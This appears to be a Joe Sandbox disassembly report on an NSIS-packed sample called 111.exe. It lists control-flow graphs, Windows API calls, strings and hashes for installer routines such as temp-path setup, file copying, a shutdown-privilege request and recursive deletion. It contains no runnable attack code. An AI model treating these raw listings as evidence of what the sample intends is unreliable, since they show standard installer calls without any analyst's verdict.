                                                                                                                              control_flow_graph 0 4034c5-403502 SetErrorMode GetVersion 1 403504-40350c call 406806 0->1 2 403515 0->2 1->2 8 40350e 1->8 3 40351a-40352e call 406796 lstrlenA 2->3 9 403530-40354c call 406806 * 3 3->9 8->2 16 40355d-4035bc #17 OleInitialize SHGetFileInfoW call 406411 GetCommandLineW call 406411 9->16 17 40354e-403554 9->17 24 4035c6-4035e0 call 405d13 CharNextW 16->24 25 4035be-4035c5 16->25 17->16 22 403556 17->22 22->16 28 4035e6-4035ec 24->28 29 4036f7-403711 GetTempPathW call 403494 24->29 25->24 31 4035f5-4035f9 28->31 32 4035ee-4035f3 28->32 36 403713-403731 GetWindowsDirectoryW lstrcatW call 403494 29->36 37 403769-403783 DeleteFileW call 403015 29->37 34 403600-403604 31->34 35 4035fb-4035ff 31->35 32->31 32->32 38 4036c3-4036d0 call 405d13 34->38 39 40360a-403610 34->39 35->34 36->37 54 403733-403763 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403494 36->54 57 403834-403844 ExitProcess OleUninitialize 37->57 58 403789-40378f 37->58 55 4036d2-4036d3 38->55 56 4036d4-4036da 38->56 43 403612-40361a 39->43 44 40362b-403664 39->44 50 403621 43->50 51 40361c-40361f 43->51 45 403681-4036bb 44->45 46 403666-40366b 44->46 45->38 53 4036bd-4036c1 45->53 46->45 52 40366d-403675 46->52 50->44 51->44 51->50 61 403677-40367a 52->61 62 40367c 52->62 53->38 63 4036e2-4036f0 call 406411 53->63 54->37 54->57 55->56 56->28 65 4036e0 56->65 59 40396a-403970 57->59 60 40384a-40385a call 405a77 ExitProcess 57->60 66 403824-40382b call 403ae0 58->66 67 403795-4037a0 call 405d13 58->67 69 403972-403988 GetCurrentProcess OpenProcessToken 59->69 70 4039ee-4039f6 59->70 61->45 61->62 62->45 72 4036f5 63->72 65->72 76 403830 66->76 83 4037a2-4037d7 67->83 84 4037ee-4037f8 67->84 80 40398a-4039b8 LookupPrivilegeValueW AdjustTokenPrivileges 69->80 81 4039be-4039cc call 406806 69->81 77 4039f8 70->77 78 4039fc-403a00 ExitProcess 70->78 72->29 76->57 77->78 80->81 94 4039da-4039e5 ExitWindowsEx 81->94 95 4039ce-4039d8 81->95 86 4037d9-4037dd 83->86 87 403860-403874 call 4059e2 lstrcatW 84->87 88 4037fa-403808 call 405dee 84->88 90 4037e6-4037ea 86->90 91 4037df-4037e4 86->91 101 403881-40389b lstrcatW lstrcmpiW 87->101 102 403876-40387c lstrcatW 87->102 88->57 103 40380a-403820 call 406411 * 2 88->103 90->86 97 4037ec 90->97 91->90 91->97 94->70 96 4039e7-4039e9 call 40140b 94->96 95->94 95->96 96->70 97->84 101->57 105 40389d-4038a0 101->105 102->101 103->66 107 4038a2-4038a7 call 405948 105->107 108 4038a9 call 4059c5 105->108 113 4038ae-4038bc SetCurrentDirectoryW 107->113 108->113 116 4038c9-4038f2 call 406411 113->116 117 4038be-4038c4 call 406411 113->117 121 4038f7-403913 call 40644e DeleteFileW 116->121 117->116 124 403954-40395c 121->124 125 403915-403925 CopyFileW 121->125 124->121 126 40395e-403965 call 4061d7 124->126 125->124 127 403927-403947 call 4061d7 call 40644e call 4059fa 125->127 126->57 127->124 136 403949-403950 CloseHandle 127->136 136->124
                                                                                                                              APIs
                                                                                                                              • SetErrorMode.KERNELBASE ref: 004034E8
                                                                                                                              • GetVersion.KERNEL32 ref: 004034EE
                                                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403521
                                                                                                                              • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 0040355E
                                                                                                                              • OleInitialize.OLE32(00000000), ref: 00403565
                                                                                                                              • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403581
                                                                                                                              • GetCommandLineW.KERNEL32(00433F00,NSIS Error,?,00000007,00000009,0000000B), ref: 00403596
                                                                                                                              • CharNextW.USER32(00000000,00440000,00000020,00440000,00000000,?,00000007,00000009,0000000B), ref: 004035CE
                                                                                                                                • Part of subcall function 00406806: GetModuleHandleA.KERNEL32(?,00000020,?,00403537,0000000B), ref: 00406818
                                                                                                                                • Part of subcall function 00406806: GetProcAddress.KERNEL32(00000000,?), ref: 00406833
                                                                                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 00403708
                                                                                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403719
                                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403725
                                                                                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403739
                                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403741
                                                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 00403752
                                                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040375A
                                                                                                                              • DeleteFileW.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 0040376E
                                                                                                                                • Part of subcall function 00406411: lstrcpynW.KERNEL32(?,?,00000400,00403596,00433F00,NSIS Error,?,00000007,00000009,0000000B), ref: 0040641E
                                                                                                                              • ExitProcess.KERNEL32(00000007,?,00000007,00000009,0000000B), ref: 00403834
                                                                                                                              • OleUninitialize.OLE32(00000007,?,00000007,00000009,0000000B), ref: 00403839
                                                                                                                              • ExitProcess.KERNEL32 ref: 0040385A
                                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 0040386D
                                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 0040387C
                                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403887
                                                                                                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00441800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00440000,00000000,00000007,?,00000007,00000009,0000000B), ref: 00403893
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004038AF
                                                                                                                              • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,Admin,00000009,?,00000007,00000009,0000000B), ref: 00403909
                                                                                                                              • CopyFileW.KERNEL32(C:\Users\Public\111.exe,0042AA28,00000001,?,00000007,00000009,0000000B), ref: 0040391D
                                                                                                                              • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000,?,00000007,00000009,0000000B), ref: 0040394A
                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403979
                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403980
                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403995
                                                                                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 004039B8
                                                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 004039DD
                                                                                                                              • ExitProcess.KERNEL32 ref: 00403A00
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Processlstrcat$ExitFile$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                              • String ID: .tmp$1033$Admin$C:\Users\Public\111.exe$C:\Users\user\AppData\Local\Temp\$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                              • API String ID: 424501083-244240631
                                                                                                                              • Opcode ID: c72fc64d58c1f39d7da3ffa7a99993c1a1ff5748412f8d16dbd5718b6d299c9e
                                                                                                                              • Instruction ID: 633452ec6b1f102921f1489b21fe302f429ce1b90f1906ff0e0a9b5b291269fb
                                                                                                                              • Opcode Fuzzy Hash: c72fc64d58c1f39d7da3ffa7a99993c1a1ff5748412f8d16dbd5718b6d299c9e
                                                                                                                              • Instruction Fuzzy Hash: 7DD12671600311ABE7207F659D45B3B3AACEB8070AF11443FF581B62D1DBBD89518B6E
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004055B8 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 137 4055b8-4055d3 138 405762-405769 137->138 139 4055d9-4056a0 GetDlgItem * 3 call 40439c call 404cf5 GetClientRect GetSystemMetrics SendMessageW * 2 137->139 141 405793-4057a0 138->141 142 40576b-40578d GetDlgItem CreateThread FindCloseChangeNotification 138->142 161 4056a2-4056bc SendMessageW * 2 139->161 162 4056be-4056c1 139->162 144 4057a2-4057a8 141->144 145 4057be-4057c8 141->145 142->141 147 4057e3-4057ec call 4043ce 144->147 148 4057aa-4057b9 ShowWindow * 2 call 40439c 144->148 149 4057ca-4057d0 145->149 150 40581e-405822 145->150 158 4057f1-4057f5 147->158 148->145 151 4057d2-4057de call 404340 149->151 152 4057f8-405808 ShowWindow 149->152 150->147 155 405824-40582a 150->155 151->147 159 405818-405819 call 404340 152->159 160 40580a-405813 call 405479 152->160 155->147 163 40582c-40583f SendMessageW 155->163 159->150 160->159 161->162 166 4056d1-4056e8 call 404367 162->166 167 4056c3-4056cf SendMessageW 162->167 168 405941-405943 163->168 169 405845-405870 CreatePopupMenu call 40644e AppendMenuW 163->169 176 4056ea-4056fe ShowWindow 166->176 177 40571e-40573f GetDlgItem SendMessageW 166->177 167->166 168->158 174 405872-405882 GetWindowRect 169->174 175 405885-40589a TrackPopupMenu 169->175 174->175 175->168 178 4058a0-4058b7 175->178 179 405700-40570b ShowWindow 176->179 180 40570d 176->180 177->168 181 405745-40575d SendMessageW * 2 177->181 182 4058bc-4058d7 SendMessageW 178->182 183 405713-405719 call 40439c 179->183 180->183 181->168 182->182 184 4058d9-4058fc OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 182->184 183->177 186 4058fe-405925 SendMessageW 184->186 186->186 187 405927-40593b GlobalUnlock SetClipboardData CloseClipboard 186->187 187->168
                                                                                                                              APIs
                                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 00405616
                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00405625
                                                                                                                              • GetClientRect.USER32(?,?), ref: 00405662
                                                                                                                              • GetSystemMetrics.USER32(00000002), ref: 00405669
                                                                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040568A
                                                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040569B
                                                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004056AE
                                                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004056BC
                                                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056CF
                                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056F1
                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405705
                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405726
                                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405736
                                                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040574F
                                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040575B
                                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 00405634
                                                                                                                                • Part of subcall function 0040439C: SendMessageW.USER32(00000028,?,00000001,004041C7), ref: 004043AA
                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405778
                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_0000554C,00000000), ref: 00405786
                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040578D
                                                                                                                              • ShowWindow.USER32(00000000), ref: 004057B1
                                                                                                                              • ShowWindow.USER32(0002048E,00000008), ref: 004057B6
                                                                                                                              • ShowWindow.USER32(00000008), ref: 00405800
                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405834
                                                                                                                              • CreatePopupMenu.USER32 ref: 00405845
                                                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405859
                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00405879
                                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405892
                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058CA
                                                                                                                              • OpenClipboard.USER32(00000000), ref: 004058DA
                                                                                                                              • EmptyClipboard.USER32 ref: 004058E0
                                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058EC
                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004058F6
                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040590A
                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0040592A
                                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405935
                                                                                                                              • CloseClipboard.USER32 ref: 0040593B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                                                                                              • String ID: {
                                                                                                                              • API String ID: 4154960007-366298937
                                                                                                                              • Opcode ID: f0fd2e1a1f6109bd428cca54ea167e09023d8e4ecaec3e055b9f768bc27e185c
                                                                                                                              • Instruction ID: ef42e6e7ad26681d1de71b6013131fdd69d98400fc0f56e042e978cac442fd71
                                                                                                                              • Opcode Fuzzy Hash: f0fd2e1a1f6109bd428cca54ea167e09023d8e4ecaec3e055b9f768bc27e185c
                                                                                                                              • Instruction Fuzzy Hash: 45B138B1900608FFDB11AFA0DE85AAE7B79FB44355F00803AFA41B61A0CB755E51DF68
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00404858 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 275stringCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 367 404858-404882 368 404884-404890 call 405a5b call 4066c0 367->368 369 404895-40489f 367->369 368->369 371 4048a1-4048b7 GetDlgItem call 405d5d 369->371 372 40490d-404914 369->372 383 4048c9-404902 SetWindowTextW call 404367 * 2 call 40439c call 406806 371->383 384 4048b9-4048c1 call 405d91 371->384 375 40491a-404923 372->375 376 4049eb-4049f2 372->376 379 404925-404930 375->379 380 40493d-404942 375->380 381 404a01-404a1c call 405a5b call 405dee 376->381 382 4049f4-4049fb 376->382 385 404936 379->385 386 404b99-404bab call 4043ce 379->386 380->376 387 404948-40498a call 40644e SHBrowseForFolderW 380->387 407 404a25-404a3d call 406411 call 406806 381->407 408 404a1e 381->408 382->381 382->386 383->386 423 404908-40490b SHAutoComplete 383->423 384->383 399 4048c3-4048c4 call 405ce6 384->399 385->380 400 4049e4 387->400 401 40498c-4049a6 CoTaskMemFree call 405ce6 387->401 399->383 400->376 412 4049d0-4049e2 SetDlgItemTextW 401->412 413 4049a8-4049ae 401->413 424 404a79-404a8a call 406411 call 405d91 407->424 425 404a3f-404a45 407->425 408->407 412->376 413->412 416 4049b0-4049c7 call 40644e lstrcmpiW 413->416 416->412 426 4049c9-4049cb lstrcatW 416->426 423->372 439 404a8c 424->439 440 404a8f-404aa8 GetDiskFreeSpaceW 424->440 425->424 427 404a47-404a59 GetDiskFreeSpaceExW 425->427 426->412 429 404ad1-404aeb 427->429 430 404a5b-404a5d 427->430 432 404aed 429->432 433 404a62-404a77 call 405d32 430->433 434 404a5f 430->434 437 404af2-404afc call 404cf5 432->437 433->424 433->427 434->433 445 404b17-404b20 437->445 446 404afe-404b05 437->446 439->440 440->432 443 404aaa-404acf MulDiv 440->443 443->437 448 404b52-404b5c 445->448 449 404b22-404b32 call 404cdd 445->449 446->445 447 404b07 446->447 452 404b10 447->452 453 404b09-404b0e 447->453 450 404b68-404b6e 448->450 451 404b5e-404b65 call 40140b 448->451 459 404b44-404b4d SetDlgItemTextW 449->459 460 404b34-404b3d call 404c14 449->460 457 404b70 450->457 458 404b73-404b84 call 404389 450->458 451->450 452->445 453->445 453->452 457->458 466 404b93 458->466 467 404b86-404b8c 458->467 459->448 465 404b42 460->465 465->448 466->386 467->466 468 404b8e call 4047b1 467->468 468->466
                                                                                                                              APIs
                                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 004048A7
                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 004048D1
                                                                                                                              • SHAutoComplete.SHLWAPI(00000000,00000001,00000008,00000000,?,00000014,?,?,00000001,?), ref: 0040490B
                                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00404982
                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 0040498D
                                                                                                                              • lstrcmpiW.KERNEL32(Remove folder: ,0042D268,00000000,?,?), ref: 004049BF
                                                                                                                              • lstrcatW.KERNEL32(?,Remove folder: ), ref: 004049CB
                                                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049DD
                                                                                                                                • Part of subcall function 00405A5B: GetDlgItemTextW.USER32(?,?,00000400,00404A14), ref: 00405A6E
                                                                                                                                • Part of subcall function 004066C0: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75923420,C:\Users\user\AppData\Local\Temp\,00440000,004034A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F,?,00000007,00000009,0000000B), ref: 00406723
                                                                                                                                • Part of subcall function 004066C0: CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406732
                                                                                                                                • Part of subcall function 004066C0: CharNextW.USER32(?,00000000,75923420,C:\Users\user\AppData\Local\Temp\,00440000,004034A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F,?,00000007,00000009,0000000B), ref: 00406737
                                                                                                                                • Part of subcall function 004066C0: CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00440000,004034A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F,?,00000007,00000009,0000000B), ref: 0040674A
                                                                                                                              • GetDiskFreeSpaceExW.KERNELBASE(0042B238,?,?,?,00000001,0042B238,?,?,000003FB,?), ref: 00404A54
                                                                                                                              • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404AA0
                                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404ABB
                                                                                                                                • Part of subcall function 00404C14: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CB5
                                                                                                                                • Part of subcall function 00404C14: wsprintfW.USER32 ref: 00404CBE
                                                                                                                                • Part of subcall function 00404C14: SetDlgItemTextW.USER32(?,0042D268), ref: 00404CD1
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CharItemText$FreeNext$DiskSpace$AutoBrowseCompleteFolderPrevTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                              • String ID: A$Admin$Remove folder:
                                                                                                                              • API String ID: 4039761011-590456623
                                                                                                                              • Opcode ID: ebc0b2b54b540d981966a95ad289f1579521fa34262d35f4ea44b6b61deb13c2
                                                                                                                              • Instruction ID: 0d1333b798dde08b2b35772059431d035751c92a28532a026af6b574b599a32b
                                                                                                                              • Opcode Fuzzy Hash: ebc0b2b54b540d981966a95ad289f1579521fa34262d35f4ea44b6b61deb13c2
                                                                                                                              • Instruction Fuzzy Hash: 56A15EF1A00209ABDB11AFA5CD45AAFB7B8EF84314F10843BF601B62D1D77C99418B6D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00405B23 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 600 405b23-405b49 call 405dee 603 405b62-405b69 600->603 604 405b4b-405b5d DeleteFileW 600->604 606 405b6b-405b6d 603->606 607 405b7c-405b8c call 406411 603->607 605 405cdf-405ce3 604->605 609 405b73-405b76 606->609 610 405c8d-405c92 606->610 613 405b9b-405b9c call 405d32 607->613 614 405b8e-405b99 lstrcatW 607->614 609->607 609->610 610->605 612 405c94-405c97 610->612 615 405ca1-405ca9 call 40676f 612->615 616 405c99-405c9f 612->616 617 405ba1-405ba5 613->617 614->617 615->605 624 405cab-405cbf call 405ce6 call 405adb 615->624 616->605 620 405bb1-405bb7 lstrcatW 617->620 621 405ba7-405baf 617->621 623 405bbc-405bd8 lstrlenW FindFirstFileW 620->623 621->620 621->623 625 405c82-405c86 623->625 626 405bde-405be6 623->626 642 405cc1-405cc4 624->642 643 405cd7-405cda call 405479 624->643 625->610 628 405c88 625->628 629 405c06-405c1a call 406411 626->629 630 405be8-405bf0 626->630 628->610 640 405c31-405c3c call 405adb 629->640 641 405c1c-405c24 629->641 632 405bf2-405bfa 630->632 633 405c65-405c75 FindNextFileW 630->633 632->629 637 405bfc-405c04 632->637 633->626 636 405c7b-405c7c FindClose 633->636 636->625 637->629 637->633 653 405c5d-405c60 call 405479 640->653 654 405c3e-405c41 640->654 641->633 645 405c26-405c2f call 405b23 641->645 642->616 644 405cc6-405cd5 call 405479 call 4061d7 642->644 643->605 644->605 645->633 653->633 656 405c43-405c53 call 405479 call 4061d7 654->656 657 405c55-405c5b 654->657 656->633 657->633
                                                                                                                              APIs
                                                                                                                              • DeleteFileW.KERNELBASE(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B4C
                                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\*.*,\*.*), ref: 00405B94
                                                                                                                              • lstrcatW.KERNEL32(?,0040A014), ref: 00405BB7
                                                                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\*.*,?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BBD
                                                                                                                              • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\*.*,?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BCD
                                                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C6D
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00405C7C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\*.*$\*.*
                                                                                                                              • API String ID: 2035342205-1931925971
